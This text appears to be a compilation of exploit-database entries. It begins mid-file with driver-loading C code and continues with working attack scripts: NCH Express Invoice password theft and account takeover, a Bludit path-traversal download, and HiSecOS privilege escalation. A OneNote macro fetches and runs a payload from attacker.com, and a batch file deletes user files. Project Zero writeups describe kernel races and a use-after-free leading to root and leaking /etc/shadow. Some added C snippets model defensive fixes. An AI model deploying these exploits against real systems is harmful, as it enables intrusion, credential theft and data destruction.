    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
    {
        printf("Error loading vulnerable driver: %lu\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Error opening vulnerable driver device: %lu\n", GetLastError());
        return 1;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);
    memset(output_buffer, 0, IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
    {
        printf("Error sending IOCTL: %lu\n", GetLastError());
        return 1;
    }

    // Print the output buffer contents (printed as a string, so it stops at the first NUL byte)
    output_buffer[IOCTL_BUFFER_SIZE - 1] = '\0';
    printf("Output buffer:\n%s\n", output_buffer);

    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver"))
    {
        printf("Error unloading vulnerable driver: %lu\n", GetLastError());
        return 1;
    }

    // Close the vulnerable driver device
    CloseHandle(device);
    return 0;
}

BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL)
    {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS)
        {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL)
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
        else
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Start the service
    if (!StartService(service, 0, NULL))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

BOOL UnloadDriver(LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL)
    {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Delete the service
    if (!DeleteService(service))
    {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}
# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure
# Date: 5/31/2023
# Exploit Author: Victor A. Morales, GM Sectec Inc.
# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php
# Version: 4.3.5.8788 (other versions may be affected)
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-34834
Description:
Directory browsing vulnerability in the MCL-Net 4.3.5.8788 web server, which listens on port 5080 by default, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.
Steps to reproduce:
1. Navigate to the web server on default port 5080; its "Index of Services" page discloses directories, including "/file".
2. Browse to the "/file" directory and into the folders of the configured database entries.
3. The "AdoInfo.txt" file contains the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.
# Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover
# Google Dork:: intitle:ExpressInvoice - Login
# Date: 07/Apr/2020
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://www.nchsoftware.com/
# Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe
# Version: NCH Express Invoice 8.24 and before
# CVE Number : CVE-2020-11560
# CVSS: 7.8 (High)
# Reference: https://cvewalkthrough.com/cve-2020-11560/
# Vulnerability Description:
# Express Invoice is a thick client application with a function that exposes the application over the web. While configuring web access, the application asks for user details such as username, password and email. It stores this information in "C:\ProgramData\NCH Software\ExpressInvoice\Accounts" in clear text, and because of inadequate folder permissions any low-privileged authenticated user can read the files stored there.
# Note: from version 8.24 the path changed to "C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts"
import os
import urllib.parse

# Enable ANSI escape sequences for colors on Windows
if os.name == 'nt':
    os.system('')

# Function to decode URL encoding
def decode_url(url):
    decoded_url = urllib.parse.unquote(url)
    return decoded_url

# Function to list files and display as numeric list
def list_files(file_list):
    for i, file in enumerate(file_list, start=1):
        # Omit the part of the file name after %40
        username = file.split("%40")[0]
        print(f"{i}. {username}")

# Main program
print("\033[93mDisclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m")
agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m")
if agreement != '1':
    print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m")
    exit()

nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m")
# Versions before 8.24 keep the account files under "Accounts"; 8.24 and later
# use "WebAccounts" (see the note above).
if nch_version == '1':
    file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts"
else:
    file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts"
file_list = os.listdir(file_directory)
print("\033[94mUser Accounts:\033[0m")
list_files(file_list)
selected_file = input("\033[94mSelect the file number for the user: \033[0m")
selected_file = int(selected_file) - 1
file_path = os.path.join(file_directory, file_list[selected_file])
with open(file_path, 'r') as file:
    contents = file.read()
print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m")
exploit_option = input("\n\033[94mSelect the exploit option: "
                       "\n1. Display User Passwords "
                       "\n2. Account Takeover Using Password Replace "
                       "\n3. User Privilege Escalation\nOption: \033[0m")

# Exploit actions
if exploit_option == "1":
    decoded_contents = decode_url(contents)
    print("\033[91mPlease find the password in the below string:\033[0m")
    print(decoded_contents)
elif exploit_option == "2":
    new_password = input("\033[92mEnter the new password: \033[0m")
    current_password = contents.split("Password=")[1].split("&")[0]
    replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}")
    print("\033[92mSelected user's password changed to: Your password\033[0m")
    print(replaced_contents)
    with open(file_path, 'w') as file:
        file.write(replaced_contents)
elif exploit_option == "3":
    # "Priviligies" is the key name as it appears in the account file
    replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1")
    print("\033[92mUser is now an Administrator.\033[0m")
    print(replaced_contents)
    with open(file_path, 'w') as file:
        file.write(replaced_contents)
else:
    print("\033[91mInvalid exploit option. Exiting the program.\033[0m")
    exit()

print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m")
input("\033[91mPress enter to exit.\033[0m")
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14
import requests
import argparse
from bs4 import BeautifulSoup  # pip3 install beautifulsoup4


def main():
    parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
    parser.add_argument('-x', '--url', type=str, required=True)
    parser.add_argument('-u', '--user', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    parser.add_argument('-f', '--file', type=str, required=True)
    args = parser.parse_args()
    print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)", "\nExploit Author: Antonio Cuomo (Arkantolo)\n")
    exploit(args)


def exploit(args):
    s2 = requests.Session()
    url = args.url.rstrip("/")
    # get the CSRF token from the login form
    r = s2.get(url + '/admin/')
    soup = BeautifulSoup(r.text, 'html.parser')
    formtoken = soup.find('input', {'name': 'tokenCSRF'})['value']
    # login
    body = {'tokenCSRF': formtoken, 'username': args.user, 'password': args.password}
    r = s2.post(url + '/admin/', data=body, allow_redirects=False)
    if r.status_code == 301 and r.headers.get('location', '').find('/admin/dashboard') != -1:
        print("[*] Login OK")
    else:
        print("[*] Login Failed")
        exit(1)
    # arbitrary download: the backup plugin joins the file parameter to its directory without normalising it
    r = s2.get(url + '/plugin-backup-download?file=../../../../../../../../' + args.file)
    if r.status_code == 200 and len(r.content) > 0:
        print("[*] File:")
        print(r.text)
    else:
        print("[*] Exploit Failed")
        exit(1)


if __name__ == '__main__':
    main()
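The download request above works because the plugin joins the `file` parameter to its backup directory without normalising it. The following is an added example, not Bludit's code (which is PHP): a C sketch of the unchecked join beside a lexical normaliser that rejects absolute paths and any `..` that would climb above the base directory. The base directory `/srv/backups` is an assumption for the demo, and the caller is expected to have URL-decoded the parameter already; symlinks inside the base are a separate concern and would still need `realpath()` before serving.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The shape the vulnerable handler has: plain concatenation, so a
 * user-supplied "../../etc/passwd" walks straight out of the base directory. */
void join_unchecked(const char *base, const char *user, char *out, size_t outlen)
{
    snprintf(out, outlen, "%s/%s", base, user);
}

/* Lexically normalise a user-supplied relative path and join it under base.
 * Rejects absolute paths, any ".." that would climb above base, and an
 * empty result.  Segment pointers refer into `user`, so no allocation. */
bool resolve_under(const char *base, const char *user, char *out, size_t outlen)
{
    const char *segs[64];
    size_t lens[64];
    size_t depth = 0;

    if (user == NULL || user[0] == '/')      /* absolute path: not a backup name */
        return false;

    const char *p = user;
    while (*p) {
        const char *q = strchr(p, '/');
        size_t n = q ? (size_t)(q - p) : strlen(p);
        if (n == 0 || (n == 1 && p[0] == '.')) {
            /* "//" or "." : no-op */
        } else if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0)
                return false;                /* would climb above base */
            depth--;
        } else {
            if (depth == 64)
                return false;                /* absurdly deep: refuse */
            segs[depth] = p;
            lens[depth] = n;
            depth++;
        }
        if (!q)
            break;
        p = q + 1;
    }
    if (depth == 0)
        return false;                        /* resolves to base itself, not a file */

    size_t used = strlen(base);
    if (used + 1 > outlen)
        return false;
    memcpy(out, base, used);
    for (size_t i = 0; i < depth; i++) {
        if (used + 1 + lens[i] + 1 > outlen)
            return false;
        out[used++] = '/';
        memcpy(out + used, segs[i], lens[i]);
        used += lens[i];
    }
    out[used] = '\0';
    return true;
}

int main(void)
{
    char out[256];
    const char *evil = "../../../../../../../../etc/passwd";   /* the exploit's file parameter */
    join_unchecked("/srv/backups", evil, out, sizeof out);
    printf("unchecked join serves: %s\n", out);
    printf("normalised join: %s\n",
           resolve_under("/srv/backups", evil, out, sizeof out) ? out : "rejected");
    if (resolve_under("/srv/backups", "sub/../backup.zip", out, sizeof out))
        printf("legitimate name resolves to: %s\n", out);
    return 0;
}
```

The check is deliberately lexical and allocation-free so it can run before any filesystem access; a `..` that is only reachable after following a symlink inside the base is not caught here, which is why production code resolves the final path with `realpath()` and re-checks the prefix.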
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected
## Description:
Microsoft OneNote is vulnerable to spoofing attacks. A malicious user can trick the victim into clicking a maliciously crafted URL, or into downloading some other malicious file and executing it. Once that happens the victim's computer is compromised.
Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click a specially crafted URL supplied by the attacker.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub AutoOpen()
    ' Fetch the second-stage payload and run it from the current directory
    Call Shell("cmd.exe /S /c " & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub
```
[+]Inside-exploit
```bat
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)
## Time spent:
01:15:00
--
#!/bin/bash
# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation
# Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation
# Date: 21.06.2023
# Exploit Author: dreizehnutters
# Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016
# Version: HiSecOS-04.0.01 or lower
# Tested on: HiSecOS-04.0.01
# CVE: BSECV-2021-07

if [[ $# -lt 3 ]]; then
    echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"
    exit 1
fi

target="$1"
user="$2"
pass="$3"

# Craft the HTTP Basic header value (strip base64 line wrapping for long credentials)
auth=$(printf '%s' "$user:$pass" | base64 | tr -d '\n')

# Convert the user name to ASCII hex (xxd emits one byte per line here); used as the table index
blob=$(printf '%s' "$user" | xxd -ps -c 1)

# Generate XML payload ('15' -> admin role)
gen_payload() {
    cat <<EOF
<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20">
  <mibOperation xmlns="urn:x-mops:1.0">
    <edit-config>
      <MIBData>
        <MIB name="HM2-USERMGMT-MIB">
          <Node name="hm2UserConfigEntry">
            <Index>
              <Attribute name="hm2UserName">$blob</Attribute>
            </Index>
            <Set name="hm2UserAccessRole">15</Set>
          </Node>
        </MIB>
      </MIBData>
    </edit-config>
  </mibOperation>
</rpc>
EOF
}

# The authenticated low-privilege user writes its own access role; the server does not check authorisation for this set
curl -i -s -k -X POST \
    -H "content-type: application/xml" \
    -H "authorization: Basic ${auth}" \
    --data-binary "$(gen_payload)" \
    "https://${target}/mops_data"

echo "[*] $user is now an admin"
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=817
Fuzzing packed executables with McAfee's LiveSafe 14.0 on Windows found a signedness error when parsing sections and relocations. The attached fuzzed testcase demonstrates this and causes a crash in mscan64a.dll. I verified that the crash reproduces on Linux and Windows; all versions of McAfee appear to be affected, including the embedded version and the SDK.
Naturally, this code runs as SYSTEM on Windows with no sandboxing, and it is used to parse untrusted remote input.
0:045> .lastevent
Last event: d34.13a4: Access violation - code c0000005 (first chance)
debugger time: Tue Apr 5 15:02:40.009 2016 (UTC - 7:00)
0:045> r
rax=00000000306f1000 rbx=00000000306f1000 rcx=00000000ffffffff
rdx=00000001031d114f rsi=00000000031d1150 rdi=00000000306f4000
rip=00000000711a36fa rsp=00000000064748a0 rbp=00000000031ca880
r8=00000000000005d3 r9=00000000306f0fff r10=8d00008661e82404
r11=0000000000000000 r12=00000000306f4000 r13=000000000647917c
r14=000000001070c1b8 r15=00000000031ca698
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
mscan64a!RetrieveSingleExtensionList+0x19844a:
00000000`711a36fa 0fb64a01 movzx ecx,byte ptr [rdx+1] ds:00000001`031d1150=??
Okay, what happened there?
0:007> ub
mscan64a!RetrieveSingleExtensionList+0x198437:
00000000`71fd36e7 8b45c8 mov eax,dword ptr [rbp-38h]
00000000`71fd36ea 8b08 mov ecx,dword ptr [rax]
00000000`71fd36ec 8d4101 lea eax,[rcx+1]
00000000`71fd36ef 3bc7 cmp eax,edi
00000000`71fd36f1 7332 jae mscan64a!RetrieveSingleExtensionList+0x198475 (00000000`71fd3725)
00000000`71fd36f3 2bcb sub ecx,ebx
00000000`71fd36f5 8bd1 mov edx,ecx
00000000`71fd36f7 4803d6 add rdx,rsi
0:007> dd @rbp-38 L1
00000000`0c529018 0c52d7ac
0:007> dd 0c52d7ac L1
00000000`0c52d7ac 90000fff
So it looks like that calculation is used as an index into @rsi, which is obviously going to be oob.
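As an added illustration (a C model written here, not McAfee's code), the two functions below replay the instruction sequence above with the values from the register dump, and put a variant beside it that rejects the wrap. The index 0x306f0fff is implied by ecx = 0xffffffff after "sub ecx,ebx" with ebx = 0x306f1000 (r9 still holds it); the buffer length 0x3000 (rdi - rbx) is an assumption for the demo.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the shipped check: idx is the 32-bit value loaded through
 * [rbp-38h] into ecx, base is ebx, limit is edi, and the returned offset
 * is what sits in rdx just before "add rdx,rsi". */
bool offset_as_shipped(uint32_t idx, uint32_t base, uint32_t limit, uint64_t *off)
{
    uint32_t eax = idx + 1;          /* lea eax,[rcx+1] */
    if (eax >= limit)                /* cmp eax,edi ; jae : unsigned upper-bound check only */
        return false;
    uint32_t ecx = idx - base;       /* sub ecx,ebx : wraps to 0xffffffff when idx == base - 1 */
    *off = (uint64_t)ecx;            /* mov edx,ecx zero-extends the wrapped value into rdx */
    return true;                     /* add rdx,rsi ; movzx ecx,byte ptr [rdx+1] reads ~4 GiB past rsi */
}

/* Hardened variant: refuse indices below the base before subtracting, do
 * the arithmetic in 64 bits, and bound the byte actually read ([off+1])
 * against the real buffer length rather than only the raw index. */
bool offset_checked(uint32_t idx, uint32_t base, uint32_t limit, size_t buflen, uint64_t *off)
{
    if (idx < base)
        return false;                /* 32-bit subtraction would wrap */
    if (idx == UINT32_MAX || idx + 1 >= limit)
        return false;                /* the original upper bound, without the idx+1 wrap */
    uint64_t rel = (uint64_t)idx - base;
    if (rel + 1 >= buflen)
        return false;                /* the read touches byte rel+1 */
    *off = rel;
    return true;
}

int main(void)
{
    /* ebx = 0x306f1000, edi = 0x306f4000, rsi = 0x031d1150 from the register dump */
    uint64_t off = 0;
    if (offset_as_shipped(0x306f0fffu, 0x306f1000u, 0x306f4000u, &off))
        printf("shipped check passes: rdx = rsi + 0x%llx, faulting read at 0x%llx\n",
               (unsigned long long)off, 0x31d1150ull + off + 1);
    printf("checked variant %s the same index\n",
           offset_checked(0x306f0fffu, 0x306f1000u, 0x306f4000u, 0x3000, &off) ? "accepts" : "rejects");
    return 0;
}
```

The computed faulting address, rsi + 0xffffffff + 1 = 0x1031d1150, matches the "ds:00000001`031d1150=??" in the crash line, which is a cheap way to confirm the model before spending time in the debugger.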
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39770.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=807
A race condition in perf_event_open() allows local attackers to leak sensitive data from setuid programs.
perf_event_open() associates with a task as follows:
SYSCALL_DEFINE5(perf_event_open,
        struct perf_event_attr __user *, attr_uptr,
        pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
    [...]
    struct task_struct *task = NULL;
    [...]
    if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
        task = find_lively_task_by_vpid(pid);
        if (IS_ERR(task)) {
            err = PTR_ERR(task);
            goto err_group_fd;
        }
    }
    [...]
    event = perf_event_alloc(&attr, cpu, task, group_leader, NULL,
                 NULL, NULL, cgroup_fd);
    [...]
}
In find_lively_task_by_vpid():
static struct task_struct *
find_lively_task_by_vpid(pid_t vpid)
{
    struct task_struct *task;
    int err;

    rcu_read_lock();
    if (!vpid)
        task = current;
    else
        task = find_task_by_vpid(vpid);
    if (task)
        get_task_struct(task);
    rcu_read_unlock();

    if (!task)
        return ERR_PTR(-ESRCH);

    /* Reuse ptrace permission checks for now. */
    err = -EACCES;
    if (!ptrace_may_access(task, PTRACE_MODE_READ_REALCREDS))
        goto errout;

    return task;
errout:
    [...]
}
Because no relevant locks (in particular the cred_guard_mutex) are held during the ptrace_may_access() call, it is possible for the specified target task to perform an execve() syscall with setuid execution before perf_event_alloc() actually attaches to it, allowing an attacker to bypass the ptrace_may_access() check and the perf_event_exit_task(current) call that is performed in install_exec_creds() during privileged execve() calls.
The ability to observe the execution of setuid executables using performance event monitoring can be used to leak interesting data by setting up sampling breakpoint events (PERF_TYPE_BREAKPOINT) that report userspace register contents (PERF_SAMPLE_REGS_USER) to the tracer. For example, __memcpy_sse2() in Ubuntu's eglibc-2.19 will copy small amounts of data (below 1024 bytes) by moving them through the registers RAX, R8, R9 and R10, whose contents are exposed by PERF_SAMPLE_REGS_USER. An attacker who can bypass userland ASLR (e.g. by bruteforcing the ASLR base address of the heap, which seems to only have ~16 bits of randomness on x86-64) can e.g. use this to dump the contents of /etc/shadow through /bin/su.
(The setting of the kernel.perf_event_paranoid sysctl has no impact on the ability of an attacker to leak secrets from userland processes using this issue.)
simple_poc.tar contains a simple PoC for 64bit that only demonstrates the basic issue by leaking the result of a getpid() call from a setuid executable:
$ ./test
too early
$ ./test
data_head is at 18
RAX: 9559
(If this seems to not be working, try running "while true; do ./test; done | grep -v --line-buffered 'too early'" loops in multiple terminal windows.)
shadow_poc.tar contains a PoC which leaks 32 bytes of the user's entry in /etc/shadow on an Ubuntu 14.04.3 desktop VM if ASLR has been disabled (by writing a zero to /proc/sys/kernel/randomize_va_space as root):
$ ./test
data_head is at 1080
got data: hi-autoipd:*:16848:0:99999:7:::
got data: -dispatcher:!:16848:0:99999:7:::
got data: $6$78m54P0T$WY0A/Qob/Ith0q2MzmdS
$ sudo grep user /etc/shadow
user:$6$78m54P0T$WY0A/Qob/Ith0q2MzmdSSj3jmNG117JSRJwD7qvGEUdimyTjgFpJkTNf3kyy4O31cJSBDo00b2JIQTiHhq.hu.:16911:0:99999:7:::
(If it doesn't immediately work, it might need to be re-run a few times.)
The current PoC code isn't very good at hitting the race condition, and with ASLR enabled, dumping hashes from shadow would likely take days. With a more optimized attack, it might be possible to dump password hashes in significantly less time.
Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit?id=79c9ce57eb2d5f1497546a3946b4ae21b6fdc438
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39771.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:
/* look for pseudo eBPF instructions that access map FDs and
 * replace them with actual map pointers
 */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
    struct bpf_insn *insn = env->prog->insnsi;
    int insn_cnt = env->prog->len;
    int i, j;

    for (i = 0; i < insn_cnt; i++, insn++) {
        [checks for bad instructions]
        if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
            struct bpf_map *map;
            struct fd f;

            [checks for bad instructions]

            f = fdget(insn->imm);
            map = __bpf_map_get(f);
            if (IS_ERR(map)) {
                verbose("fd %d is not pointing to valid bpf_map\n",
                    insn->imm);
                fdput(f);
                return PTR_ERR(map);
            }
            [...]
        }
    }
    [...]
}
__bpf_map_get contains the following code:
/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
    if (!f.file)
        return ERR_PTR(-EBADF);
    if (f.file->f_op != &bpf_map_fops) {
        fdput(f);
        return ERR_PTR(-EINVAL);
    }

    return f.file->private_data;
}
The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.
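The following is an added userland model in C, not kernel code, of the struct fd accounting just described: fdget() takes a reference and sets FDPUT_FPUT only when the fd table is shared, so the duplicate fdput() is harmless for a single-threaded process and becomes an over-decrement (and a premature free while the fd table still holds the file) as soon as the table is shared. The "fixed" caller drops the verifier's own fdput() on the error path, which is the property the referenced fix restores. Struct and function names carry a _model suffix to make clear they are stand-ins.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

#define FDPUT_FPUT 1   /* same meaning as the kernel flag: fdput() must drop a reference */

struct file {
    int refcount;      /* f_count; 1 = held by the fd table only */
    bool is_bpf_map;   /* stands in for f_op == &bpf_map_fops */
    bool freed;        /* set when the count reaches zero */
    void *private_data;
};

struct fd {
    struct file *file;
    unsigned int flags;
};

/* fdget(): with a shared fd table another thread could close the fd under us,
 * so a reference is taken and FDPUT_FPUT tells fdput() to drop it later.
 * With a private table no reference is taken and fdput() is a no-op. */
static struct fd fdget_model(struct file *f, bool table_shared)
{
    struct fd r = { f, 0 };
    if (f && table_shared) {
        f->refcount++;
        r.flags = FDPUT_FPUT;
    }
    return r;
}

static void fput_model(struct file *f)
{
    if (--f->refcount == 0)
        f->freed = true;   /* the kernel would free the struct file here */
}

static void fdput_model(struct fd f)
{
    if (f.flags & FDPUT_FPUT)
        fput_model(f.file);
}

/* __bpf_map_get() as quoted above: releases the fd itself on the not-a-map path. */
static void *bpf_map_get_model(struct fd f, int *err)
{
    if (!f.file) {
        *err = -EBADF;
        return NULL;
    }
    if (!f.file->is_bpf_map) {
        fdput_model(f);
        *err = -EINVAL;
        return NULL;
    }
    return f.file->private_data;
}

/* The verifier caller as reported: a second fdput() on the error path. */
int replace_map_fd_as_reported(struct file *f, bool table_shared)
{
    struct fd fd = fdget_model(f, table_shared);
    int err = 0;
    if (!bpf_map_get_model(fd, &err)) {
        fdput_model(fd);          /* double put whenever FDPUT_FPUT is set */
        return err;
    }
    fdput_model(fd);
    return 0;
}

/* One release per acquire: the error path trusts the callee's fdput(). */
int replace_map_fd_fixed(struct file *f, bool table_shared)
{
    struct fd fd = fdget_model(f, table_shared);
    int err = 0;
    if (!bpf_map_get_model(fd, &err))
        return err;
    fdput_model(fd);
    return 0;
}

int main(void)
{
    struct file plain = { 1, false, false, NULL };   /* e.g. a pipe, not a map */
    replace_map_fd_as_reported(&plain, true);
    printf("reported path, shared table: refcount=%d freed=%d (fd table still points at it)\n",
           plain.refcount, plain.freed);
    struct file plain2 = { 1, false, false, NULL };
    replace_map_fd_fixed(&plain2, true);
    printf("fixed path, shared table:    refcount=%d freed=%d\n", plain2.refcount, plain2.freed);
    return 0;
}
```

The shared-table condition is what makes the bug reachable on demand: a process that calls clone() with CLONE_FILES (or simply creates a second thread) forces __fget_light() onto the reference-taking path, which is why the PoC can trigger it deterministically rather than depending on a race.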
A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.
One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.
There are two problems with this approach:
The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)
writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on an Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
